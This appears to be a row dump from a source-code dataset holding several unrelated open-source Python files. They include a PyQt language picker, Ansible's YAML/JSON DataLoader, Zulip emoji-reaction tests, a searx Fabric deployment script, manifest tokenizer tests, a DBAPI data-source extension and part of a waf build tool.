repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
LegoStormtroopr/canard | SQBLWidgets/languagePicker.py | 1 | 4028 | import sqblUI
from SQBLutil import * # Dont like this, need to fix later.
from PyQt4 import QtGui, QtCore
import isoLangCodes
from lxml import etree
def languagePickerDialog(title = "Enter Language", default = None):
lang,success = QtGui.QInputDialog.getItem(None,
title,
"""Enter a <a href='http://en.wikipedia.org/wiki/ISO_639 '>2 letter ISO 639 Language Code ID</a>,<br>or select a common country from the list.<br>
<br>
This list of languages was selected from the <a href="en.wikipedia.org/wiki/Global_Internet_usage#Internet_users_by_language">Top 10 langauges used on the Internet</a>.<br>
American English was added, due to the large number of native users within Information Technology.""",
[""]+isoLangCodes.languageCodeList(),
current = 0,
editable = False,
)
if success:
# The entered a language successfully, good for them.
lang = lang[0:2]
lang = unicode(lang)
return (lang,success)
class LanguagePickerWidget(QtGui.QWidget,sqblUI.languagePicker.Ui_Form):
# Signal emitted if current language in the language combo box changes
# String emitted is an iso639 code
currentLanguageChanged = QtCore.pyqtSignal(str)
# String emitted is an iso639 code
languageAdded = QtCore.pyqtSignal(str)
# String emitted is an iso639 code
languageRemoved = QtCore.pyqtSignal(str)
# language and languages are iso639 languages codes
def __init__(self,language=None,languages=[],hideLabel=False):
QtGui.QWidget.__init__(self)
self.setupUi(self)
self.currentLanguage = language
languages.append(language)
self.languages = sorted(list(set(languages)))
self.configureLanguages(self.languageList)
self.addLanguageButton.clicked.connect(self.addLanguage)
self.removeLanguageButton.clicked.connect(self.removeLanguage)
self.languageList.currentIndexChanged[int].connect(self.updateLanguage)
if language in self.languages:
self.languageList.setCurrentIndex(self.languages.index(language))
else:
self.languageList.setCurrentIndex(0)
def removeLanguage(self):
pass
index = self.languageList.currentIndex()
lang = self.languageList.itemData(index)
self.languages.remove(lang)
self.languageList.removeItem(index)
self.languageRemoved.emit(lang.toPyObject())
def addLanguage(self,lang):
lang, success = languagePickerDialog()
if lang is None or lang == "":
return
lang = str(lang)
if success and lang not in self.languages:
self.languageAdded.emit(lang)
self.languages.append(lang)
self.languages.sort()
self.languageList.addItem(isoLangCodes.iso639CodeToString(lang),lang)
if lang in self.languages:
self.languageList.setCurrentIndex(self.languageList.findData(lang))
def setLanguage(self,language):
if language in self.languages:
self.languageList.setCurrentIndex(self.languages.index(language))
self.updateLanguage(self.languages.index(language))
def updateLanguage(self,index):
self.currentLanguage = str(self.languageList.itemData(index).toPyObject())
self.currentLanguageChanged.emit(self.currentLanguage)
def configureLanguages(self,comboWidget,interfaceLanguage="en"):
cw = comboWidget #Just cause its easier to refer to
for lang in self.languages:
langName = isoLangCodes.iso639CodeToString(lang)
cw.addItem(langName,lang)
if len(self.languages) == 0:
#There are no languages, so we'll add the current interface language to make sure something is there.
cw.addItem(interfaceLanguage)
langIndex = self.languageList.findData(self.currentLanguage)
self.languageList.setCurrentIndex(max(0,langIndex))
| gpl-3.0 | 3,230,996,148,769,951,000 | 40.102041 | 184 | 0.676266 | false |
bols-blue/ansible | lib/ansible/parsing/__init__.py | 19 | 7957 | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import os
from yaml import load, YAMLError
from ansible.errors import AnsibleParserError
from ansible.errors.yaml_strings import YAML_SYNTAX_ERROR
from ansible.parsing.vault import VaultLib
from ansible.parsing.splitter import unquote
from ansible.parsing.yaml.loader import AnsibleLoader
from ansible.parsing.yaml.objects import AnsibleBaseYAMLObject, AnsibleUnicode
from ansible.utils.path import unfrackpath
class DataLoader():
'''
The DataLoader class is used to load and parse YAML or JSON content,
either from a given file name or from a string that was previously
read in through other means. A Vault password can be specified, and
any vault-encrypted files will be decrypted.
Data read from files will also be cached, so the file will never be
read from disk more than once.
Usage:
dl = DataLoader()
(or)
dl = DataLoader(vault_password='foo')
ds = dl.load('...')
ds = dl.load_from_file('/path/to/file')
'''
def __init__(self, vault_password=None):
self._basedir = '.'
self._vault_password = vault_password
self._FILE_CACHE = dict()
self._vault = VaultLib(password=vault_password)
def load(self, data, file_name='<string>', show_content=True):
'''
Creates a python datastructure from the given data, which can be either
a JSON or YAML string.
'''
try:
# we first try to load this data as JSON
return json.loads(data)
except:
# if loading JSON failed for any reason, we go ahead
# and try to parse it as YAML instead
if isinstance(data, AnsibleUnicode):
# The PyYAML's libyaml bindings use PyUnicode_CheckExact so
# they are unable to cope with our subclass.
# Unwrap and re-wrap the unicode so we can keep track of line
# numbers
new_data = unicode(data)
else:
new_data = data
try:
new_data = self._safe_load(new_data, file_name=file_name)
except YAMLError as yaml_exc:
self._handle_error(yaml_exc, file_name, show_content)
if isinstance(data, AnsibleUnicode):
new_data = AnsibleUnicode(new_data)
new_data.ansible_pos = data.ansible_pos
return new_data
def load_from_file(self, file_name):
''' Loads data from a file, which can contain either JSON or YAML. '''
file_name = self.path_dwim(file_name)
# if the file has already been read in and cached, we'll
# return those results to avoid more file/vault operations
if file_name in self._FILE_CACHE:
return self._FILE_CACHE[file_name]
# read the file contents and load the data structure from them
(file_data, show_content) = self._get_file_contents(file_name)
parsed_data = self.load(data=file_data, file_name=file_name, show_content=show_content)
# cache the file contents for next time
self._FILE_CACHE[file_name] = parsed_data
return parsed_data
def path_exists(self, path):
return os.path.exists(path)
def is_file(self, path):
return os.path.isfile(path)
def is_directory(self, path):
return os.path.isdir(path)
def list_directory(self, path):
return os.listdir(path)
def _safe_load(self, stream, file_name=None):
''' Implements yaml.safe_load(), except using our custom loader class. '''
loader = AnsibleLoader(stream, file_name)
try:
return loader.get_single_data()
finally:
loader.dispose()
def _get_file_contents(self, file_name):
'''
Reads the file contents from the given file name, and will decrypt them
if they are found to be vault-encrypted.
'''
if not self.path_exists(file_name) or not self.is_file(file_name):
raise AnsibleParserError("the file_name '%s' does not exist, or is not readable" % file_name)
show_content = True
try:
with open(file_name, 'r') as f:
data = f.read()
if self._vault.is_encrypted(data):
data = self._vault.decrypt(data)
show_content = False
return (data, show_content)
except (IOError, OSError) as e:
raise AnsibleParserError("an error occurred while trying to read the file '%s': %s" % (file_name, str(e)))
def _handle_error(self, yaml_exc, file_name, show_content):
'''
Optionally constructs an object (AnsibleBaseYAMLObject) to encapsulate the
file name/position where a YAML exception occurred, and raises an AnsibleParserError
to display the syntax exception information.
'''
# if the YAML exception contains a problem mark, use it to construct
# an object the error class can use to display the faulty line
err_obj = None
if hasattr(yaml_exc, 'problem_mark'):
err_obj = AnsibleBaseYAMLObject()
err_obj.ansible_pos = (file_name, yaml_exc.problem_mark.line + 1, yaml_exc.problem_mark.column + 1)
raise AnsibleParserError(YAML_SYNTAX_ERROR, obj=err_obj, show_content=show_content)
def get_basedir(self):
''' returns the current basedir '''
return self._basedir
def set_basedir(self, basedir):
''' sets the base directory, used to find files when a relative path is given '''
if basedir is not None:
self._basedir = basedir
def path_dwim(self, given):
'''
make relative paths work like folks expect.
'''
given = unquote(given)
if given.startswith("/"):
return os.path.abspath(given)
elif given.startswith("~"):
return os.path.abspath(os.path.expanduser(given))
else:
return os.path.abspath(os.path.join(self._basedir, given))
def path_dwim_relative(self, role_path, dirname, source):
''' find one file in a directory one level up in a dir named dirname relative to current '''
basedir = os.path.dirname(role_path)
if os.path.islink(basedir):
basedir = unfrackpath(basedir)
template2 = os.path.join(basedir, dirname, source)
else:
template2 = os.path.join(basedir, '..', dirname, source)
source1 = os.path.join(role_path, dirname, source)
if os.path.exists(source1):
return source1
cur_basedir = self._basedir
self.set_basedir(basedir)
source2 = self.path_dwim(template2)
if os.path.exists(source2):
self.set_basedir(cur_basedir)
return source2
obvious_local_path = self.path_dwim(source)
if os.path.exists(obvious_local_path):
self.set_basedir(cur_basedir)
return obvious_local_path
self.set_basedir(cur_basedir)
return source2 # which does not exist
| gpl-3.0 | 911,921,087,727,697,300 | 34.842342 | 118 | 0.628629 | false |
dattatreya303/zulip | zerver/tests/test_reactions.py | 13 | 10382 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import ujson
from typing import Any, Dict, List
from six import string_types
from zerver.lib.test_helpers import tornado_redirected_to_list, get_display_recipient
from zerver.lib.test_classes import ZulipTestCase
from zerver.models import get_user_profile_by_email
class ReactionEmojiTest(ZulipTestCase):
def test_missing_emoji(self):
# type: () -> None
"""
Sending reaction without emoji fails
"""
sender = '[email protected]'
result = self.client_put('/api/v1/messages/1/emoji_reactions/',
**self.api_auth(sender))
self.assertEqual(result.status_code, 400)
def test_add_invalid_emoji(self):
# type: () -> None
"""
Sending invalid emoji fails
"""
sender = '[email protected]'
result = self.client_put('/api/v1/messages/1/emoji_reactions/foo',
**self.api_auth(sender))
self.assert_json_error(result, "Emoji 'foo' does not exist")
def test_remove_invalid_emoji(self):
# type: () -> None
"""
Removing invalid emoji fails
"""
sender = '[email protected]'
result = self.client_delete('/api/v1/messages/1/emoji_reactions/foo',
**self.api_auth(sender))
self.assert_json_error(result, "Emoji 'foo' does not exist")
def test_valid_emoji(self):
# type: () -> None
"""
Reacting with valid emoji succeeds
"""
sender = '[email protected]'
result = self.client_put('/api/v1/messages/1/emoji_reactions/smile',
**self.api_auth(sender))
self.assert_json_success(result)
self.assertEqual(200, result.status_code)
def test_valid_realm_emoji(self):
# type: () -> None
"""
Reacting with valid realm emoji succeeds
"""
sender = '[email protected]'
emoji_name = 'my_emoji'
emoji_data = {'url': 'https://example.com/my_emoji'}
result = self.client_put('/json/realm/emoji/my_emoji', info=emoji_data,
**self.api_auth(sender))
self.assert_json_success(result)
self.assertEqual(200, result.status_code)
result = self.client_get("/json/realm/emoji", **self.api_auth(sender))
content = ujson.loads(result.content)
self.assert_json_success(result)
self.assertTrue(emoji_name in content["emoji"])
result = self.client_put('/api/v1/messages/1/emoji_reactions/%s' % (emoji_name,),
**self.api_auth(sender))
self.assert_json_success(result)
class ReactionMessageIDTest(ZulipTestCase):
def test_missing_message_id(self):
# type: () -> None
"""
Reacting without a message_id fails
"""
sender = '[email protected]'
result = self.client_put('/api/v1/messages//emoji_reactions/smile',
**self.api_auth(sender))
self.assertEqual(result.status_code, 404)
def test_invalid_message_id(self):
# type: () -> None
"""
Reacting to an invalid message id fails
"""
sender = '[email protected]'
result = self.client_put('/api/v1/messages/-1/emoji_reactions/smile',
**self.api_auth(sender))
self.assertEqual(result.status_code, 404)
def test_inaccessible_message_id(self):
# type: () -> None
"""
Reacting to a inaccessible (for instance, private) message fails
"""
pm_sender = '[email protected]'
pm_recipient = '[email protected]'
reaction_sender = '[email protected]'
result = self.client_post("/api/v1/messages", {"type": "private",
"content": "Test message",
"to": pm_recipient},
**self.api_auth(pm_sender))
self.assert_json_success(result)
content = ujson.loads(result.content)
pm_id = content['id']
result = self.client_put('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_error(result, "Invalid message(s)")
class ReactionTest(ZulipTestCase):
def test_add_existing_reaction(self):
# type: () -> None
"""
Creating the same reaction twice fails
"""
pm_sender = '[email protected]'
pm_recipient = '[email protected]'
reaction_sender = pm_recipient
pm = self.client_post("/api/v1/messages", {"type": "private",
"content": "Test message",
"to": pm_recipient},
**self.api_auth(pm_sender))
self.assert_json_success(pm)
content = ujson.loads(pm.content)
pm_id = content['id']
first = self.client_put('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_success(first)
second = self.client_put('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_error(second, "Reaction already exists")
def test_remove_nonexisting_reaction(self):
# type: () -> None
"""
Removing a reaction twice fails
"""
pm_sender = '[email protected]'
pm_recipient = '[email protected]'
reaction_sender = pm_recipient
pm = self.client_post("/api/v1/messages", {"type": "private",
"content": "Test message",
"to": pm_recipient},
**self.api_auth(pm_sender))
self.assert_json_success(pm)
content = ujson.loads(pm.content)
pm_id = content['id']
add = self.client_put('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_success(add)
first = self.client_delete('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_success(first)
second = self.client_delete('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_error(second, "Reaction does not exist")
class ReactionEventTest(ZulipTestCase):
def test_add_event(self):
# type: () -> None
"""
Recipients of the message receive the reaction event
and event contains relevant data
"""
pm_sender = '[email protected]'
pm_recipient = '[email protected]'
reaction_sender = pm_recipient
result = self.client_post("/api/v1/messages", {"type": "private",
"content": "Test message",
"to": pm_recipient},
**self.api_auth(pm_sender))
self.assert_json_success(result)
content = ujson.loads(result.content)
pm_id = content['id']
expected_recipient_emails = set([pm_sender, pm_recipient])
expected_recipient_ids = set([get_user_profile_by_email(email).id for email in expected_recipient_emails])
events = [] # type: List[Dict[str, Any]]
with tornado_redirected_to_list(events):
result = self.client_put('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_success(result)
self.assertEqual(len(events), 1)
event = events[0]['event']
event_user_ids = set(events[0]['users'])
self.assertEqual(expected_recipient_ids, event_user_ids)
self.assertEqual(event['user']['email'], reaction_sender)
self.assertEqual(event['type'], 'reaction')
self.assertEqual(event['op'], 'add')
self.assertEqual(event['emoji_name'], 'smile')
self.assertEqual(event['message_id'], pm_id)
def test_remove_event(self):
# type: () -> None
"""
Recipients of the message receive the reaction event
and event contains relevant data
"""
pm_sender = '[email protected]'
pm_recipient = '[email protected]'
reaction_sender = pm_recipient
result = self.client_post("/api/v1/messages", {"type": "private",
"content": "Test message",
"to": pm_recipient},
**self.api_auth(pm_sender))
self.assert_json_success(result)
content = ujson.loads(result.content)
pm_id = content['id']
expected_recipient_emails = set([pm_sender, pm_recipient])
expected_recipient_ids = set([get_user_profile_by_email(email).id for email in expected_recipient_emails])
add = self.client_put('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_success(add)
events = [] # type: List[Dict[str, Any]]
with tornado_redirected_to_list(events):
result = self.client_delete('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_success(result)
self.assertEqual(len(events), 1)
event = events[0]['event']
event_user_ids = set(events[0]['users'])
self.assertEqual(expected_recipient_ids, event_user_ids)
self.assertEqual(event['user']['email'], reaction_sender)
self.assertEqual(event['type'], 'reaction')
self.assertEqual(event['op'], 'remove')
self.assertEqual(event['emoji_name'], 'smile')
self.assertEqual(event['message_id'], pm_id)
| apache-2.0 | 8,963,641,880,823,532,000 | 40.528 | 114 | 0.541803 | false |
PwnArt1st/searx | utils/fabfile.py | 8 | 2621 | from fabric.api import cd, run, sudo, put
from cStringIO import StringIO
base_dir = '/usr/local'
hostname = 'searx.me'
searx_dir = base_dir + '/searx'
searx_ve_dir = searx_dir + '/searx-ve'
current_user = run('whoami').stdout.strip()
uwsgi_file = '''
[uwsgi]
# Who will run the code
uid = {user}
gid = {user}
# Number of workers
workers = 8
# The right granted on the created socket
chmod-socket = 666
# Plugin to use and interpretor config
single-interpreter = true
master = true
plugin = python
# Module to import
module = searx.webapp
# Virtualenv and python path
virtualenv = {searx_ve_dir}
pythonpath = {searx_dir}
chdir = {searx_dir}/searx
'''.format(user=current_user,
searx_dir=searx_dir,
searx_ve_dir=searx_ve_dir)
nginx_config = '''
server {{
listen 80;
server_name {hostname};
server_name www.{hostname};
root /usr/local/searx;
location / {{
include uwsgi_params;
uwsgi_pass unix:/run/uwsgi/app/searx/socket;
}}
}}
'''.format(hostname=hostname)
def stop():
sudo('/etc/init.d/uwsgi stop')
def start():
sudo('/etc/init.d/uwsgi start')
def restart():
sudo('/etc/init.d/uwsgi restart')
def init():
if not run('test -d ' + searx_dir, warn_only=True).failed:
return
sudo('apt-get update')
sudo('apt-get install git'
' build-essential'
' libxslt-dev'
' python-dev'
' python-virtualenv'
' python-pybabel'
' zlib1g-dev'
' uwsgi'
' uwsgi-plugin-python'
' nginx')
sudo('mkdir -p ' + base_dir)
put(StringIO(nginx_config), '/etc/nginx/sites-enabled/searx', use_sudo=True)
sudo('/etc/init.d/nginx restart')
with cd(base_dir):
sudo('git clone https://github.com/asciimoo/searx')
sudo('chown -R {user}:{user} {searx_dir}'.format(user=current_user, searx_dir=searx_dir))
put(StringIO(uwsgi_file), searx_dir + '/uwsgi.ini')
sudo('ln -s {0}/uwsgi.ini /etc/uwsgi/apps-enabled/searx.ini'.format(searx_dir))
run('virtualenv {0}'.format(searx_ve_dir))
with cd(searx_dir):
run('source {0}/bin/activate && pip install -r requirements.txt'.format(searx_ve_dir))
start()
def deploy():
init()
with cd(searx_dir):
run("git stash", warn_only=True)
run("git pull origin master")
run("git stash pop", warn_only=True)
restart()
def clean():
sudo('rm -rf {searx_dir}'.format(searx_dir=searx_dir), warn_only=True)
sudo('rm /etc/uwsgi/apps-enabled/searx.ini', warn_only=True)
sudo('rm /etc/nginx/sites-enabled/searx', warn_only=True)
| agpl-3.0 | 6,148,656,638,491,134,000 | 21.401709 | 94 | 0.622663 | false |
atheed/servo | tests/wpt/harness/wptrunner/wptmanifest/tests/test_tokenizer.py | 195 | 11355 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import sys
import os
import unittest
sys.path.insert(0, os.path.abspath(".."))
from cStringIO import StringIO
from .. import parser
from ..parser import token_types
class TokenizerTest(unittest.TestCase):
def setUp(self):
self.tokenizer = parser.Tokenizer()
def tokenize(self, input_str):
rv = []
for item in self.tokenizer.tokenize(StringIO(input_str)):
rv.append(item)
if item[0] == token_types.eof:
break
return rv
def compare(self, input_text, expected):
expected = expected + [(token_types.eof, None)]
actual = self.tokenize(input_text)
self.assertEquals(actual, expected)
def test_heading_0(self):
self.compare("""[Heading text]""",
[(token_types.paren, "["),
(token_types.string, "Heading text"),
(token_types.paren, "]")])
def test_heading_1(self):
self.compare("""[Heading [text\]]""",
[(token_types.paren, "["),
(token_types.string, "Heading [text]"),
(token_types.paren, "]")])
def test_heading_2(self):
self.compare("""[Heading #text]""",
[(token_types.paren, "["),
(token_types.string, "Heading #text"),
(token_types.paren, "]")])
def test_heading_3(self):
self.compare("""[Heading [\]text]""",
[(token_types.paren, "["),
(token_types.string, "Heading []text"),
(token_types.paren, "]")])
def test_heading_4(self):
with self.assertRaises(parser.ParseError):
self.tokenize("[Heading")
def test_heading_5(self):
self.compare("""[Heading [\]text] #comment""",
[(token_types.paren, "["),
(token_types.string, "Heading []text"),
(token_types.paren, "]")])
def test_heading_6(self):
self.compare(r"""[Heading \ttext]""",
[(token_types.paren, "["),
(token_types.string, "Heading \ttext"),
(token_types.paren, "]")])
def test_key_0(self):
self.compare("""key:value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_key_1(self):
self.compare("""key : value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_key_2(self):
self.compare("""key : val ue""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "val ue")])
def test_key_3(self):
self.compare("""key: value#comment""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_key_4(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""ke y: value""")
def test_key_5(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""key""")
def test_key_6(self):
self.compare("""key: "value\"""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_key_7(self):
self.compare("""key: 'value'""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_key_8(self):
self.compare("""key: "#value\"""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "#value")])
def test_key_9(self):
self.compare("""key: '#value\'""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "#value")])
def test_key_10(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""key: "value""")
def test_key_11(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""key: 'value""")
def test_key_12(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""key: 'value""")
def test_key_13(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""key: 'value' abc""")
def test_key_14(self):
self.compare(r"""key: \\nb""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, r"\nb")])
def test_list_0(self):
self.compare(
"""
key: []""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.list_start, "["),
(token_types.list_end, "]")])
def test_list_1(self):
self.compare(
"""
key: [a, "b"]""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.list_start, "["),
(token_types.string, "a"),
(token_types.string, "b"),
(token_types.list_end, "]")])
def test_list_2(self):
self.compare(
"""
key: [a,
b]""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.list_start, "["),
(token_types.string, "a"),
(token_types.string, "b"),
(token_types.list_end, "]")])
def test_list_3(self):
self.compare(
"""
key: [a, #b]
c]""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.list_start, "["),
(token_types.string, "a"),
(token_types.string, "c"),
(token_types.list_end, "]")])
def test_list_4(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""key: [a #b]
c]""")
def test_list_5(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""key: [a \\
c]""")
def test_list_6(self):
self.compare(
"""key: [a , b]""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.list_start, "["),
(token_types.string, "a"),
(token_types.string, "b"),
(token_types.list_end, "]")])
def test_expr_0(self):
self.compare(
"""
key:
if cond == 1: value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.ident, "cond"),
(token_types.ident, "=="),
(token_types.number, "1"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_expr_1(self):
self.compare(
"""
key:
if cond == 1: value1
value2""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.ident, "cond"),
(token_types.ident, "=="),
(token_types.number, "1"),
(token_types.separator, ":"),
(token_types.string, "value1"),
(token_types.string, "value2")])
def test_expr_2(self):
self.compare(
"""
key:
if cond=="1": value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.ident, "cond"),
(token_types.ident, "=="),
(token_types.string, "1"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_expr_3(self):
self.compare(
"""
key:
if cond==1.1: value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.ident, "cond"),
(token_types.ident, "=="),
(token_types.number, "1.1"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_expr_4(self):
self.compare(
"""
key:
if cond==1.1 and cond2 == "a": value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.ident, "cond"),
(token_types.ident, "=="),
(token_types.number, "1.1"),
(token_types.ident, "and"),
(token_types.ident, "cond2"),
(token_types.ident, "=="),
(token_types.string, "a"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_expr_5(self):
self.compare(
"""
key:
if (cond==1.1 ): value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.paren, "("),
(token_types.ident, "cond"),
(token_types.ident, "=="),
(token_types.number, "1.1"),
(token_types.paren, ")"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_expr_6(self):
self.compare(
"""
key:
if "\\ttest": value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.string, "\ttest"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_expr_7(self):
with self.assertRaises(parser.ParseError):
self.tokenize(
"""
key:
if 1A: value""")
def test_expr_8(self):
with self.assertRaises(parser.ParseError):
self.tokenize(
"""
key:
if 1a: value""")
def test_expr_9(self):
with self.assertRaises(parser.ParseError):
self.tokenize(
"""
key:
if 1.1.1: value""")
def test_expr_10(self):
self.compare(
"""
key:
if 1.: value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.number, "1."),
(token_types.separator, ":"),
(token_types.string, "value")])
if __name__ == "__main__":
unittest.main()
| mpl-2.0 | -2,026,876,783,122,045,200 | 30.454294 | 75 | 0.471422 | false |
jnmclarty/trump | trump/extensions/source/tx-dbapi/dbapiext.py | 2 | 2524 | """
The DBAPI driver, will use by default the same driver SQLAlchemy is using for trump.
There is currently no way to change this default. It's assumed that the driver
is DBAPI 2.0 compliant.
Required kwargs include:
- 'dbinsttype' which must be one of 'COMMAND', 'KEYCOL', 'TWOKEYCOL'
- 'dsn', 'user', 'password', 'host', 'database', 'port'
Optional kwargs include:
- duphandler ['sum'] which just groups duplicate index values together via the sum.
Additional kwargs:
Required based on 'dbinsttype' chosen:
'COMMAND' :
- 'command' which is just a SQL string, where the first column becomes the index, and the second
column becomes the data.
'KEYCOL' :
- ['indexcol', 'datacol', 'table', 'keycol', 'key']
'TWOKEYCOL' :
- ['indexcol', 'datacol', 'table', 'keyacol', 'keya', 'keybcol', 'keyb']
"""
stype = 'DBAPI'
renew = True
class Source(object):
def __init__(self, ses, **kwargs):
db = __import__(ses.bind.driver)
dbargs = ['dsn', 'user', 'password', 'host', 'database', 'port']
con_kwargs = {k: v for k, v in kwargs.items() if k in dbargs}
self.con = db.connect(**con_kwargs)
import pandas as pd
self.pd = pd
def getseries(self, ses, **kwargs):
cur = self.con.cursor()
if kwargs['dbinstype'] == 'COMMAND':
qry = kwargs['command']
elif kwargs['dbinstype'] == 'KEYCOL':
reqd = ['indexcol', 'datacol', 'table', 'keycol', 'key']
rel = (kwargs[c] for c in reqd)
qry = "SELECT {0},{1} FROM {2} WHERE {3} = '{4}' ORDER BY {0};"
qry = qry.format(*rel)
elif kwargs['dbinstype'] == 'TWOKEYCOL':
reqd = ['indexcol', 'datacol', 'table', 'keyacol', 'keya', 'keybcol', 'keyb']
rel = (kwargs[c] for c in reqd)
qry = "SELECT {0},{1} FROM {2} WHERE {3} = '{4}' AND {5} = '{6}' ORDER BY {0};"
qry = qry.format(*rel)
else:
raise NotImplementedError("The database type {} has not been created.".format(kwargs['dbinstype']))
cur.execute(qry)
results = [(row[0], row[1]) for row in cur.fetchall()]
if len(results):
ind, dat = zip(*results)
else:
ind, dat = [], []
data = self.pd.Series(dat, ind)
try:
dosum = kwargs['duphandler'] == 'sum'
except:
dosum = False
if dosum:
data = data.groupby(data.index).sum()
return data
| bsd-3-clause | 4,612,658,125,963,389,000 | 31.358974 | 111 | 0.553487 | false |
cyc805/VM | waf-tools/misc.py | 53 | 11741 | #!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2006-2010 (ita)
"""
This tool is totally deprecated
Try using:
.pc.in files for .pc files
the feature intltool_in - see demos/intltool
make-like rules
"""
import shutil, re, os
from waflib import TaskGen, Node, Task, Utils, Build, Errors
from waflib.TaskGen import feature, after_method, before_method
from waflib.Logs import debug
def copy_attrs(orig, dest, names, only_if_set=False):
"""
copy class attributes from an object to another
"""
for a in Utils.to_list(names):
u = getattr(orig, a, ())
if u or not only_if_set:
setattr(dest, a, u)
def copy_func(tsk):
"Make a file copy. This might be used to make other kinds of file processing (even calling a compiler is possible)"
env = tsk.env
infile = tsk.inputs[0].abspath()
outfile = tsk.outputs[0].abspath()
try:
shutil.copy2(infile, outfile)
except (OSError, IOError):
return 1
else:
if tsk.chmod: os.chmod(outfile, tsk.chmod)
return 0
def action_process_file_func(tsk):
"Ask the function attached to the task to process it"
if not tsk.fun: raise Errors.WafError('task must have a function attached to it for copy_func to work!')
return tsk.fun(tsk)
@feature('cmd')
def apply_cmd(self):
"call a command everytime"
if not self.fun: raise Errors.WafError('cmdobj needs a function!')
tsk = Task.TaskBase()
tsk.fun = self.fun
tsk.env = self.env
self.tasks.append(tsk)
tsk.install_path = self.install_path
@feature('copy')
@before_method('process_source')
def apply_copy(self):
Utils.def_attrs(self, fun=copy_func)
self.default_install_path = 0
lst = self.to_list(self.source)
self.meths.remove('process_source')
for filename in lst:
node = self.path.find_resource(filename)
if not node: raise Errors.WafError('cannot find input file %s for processing' % filename)
target = self.target
if not target or len(lst)>1: target = node.name
# TODO the file path may be incorrect
newnode = self.path.find_or_declare(target)
tsk = self.create_task('copy', node, newnode)
tsk.fun = self.fun
tsk.chmod = getattr(self, 'chmod', Utils.O644)
if not tsk.env:
tsk.debug()
raise Errors.WafError('task without an environment')
def subst_func(tsk):
"Substitutes variables in a .in file"
m4_re = re.compile('@(\w+)@', re.M)
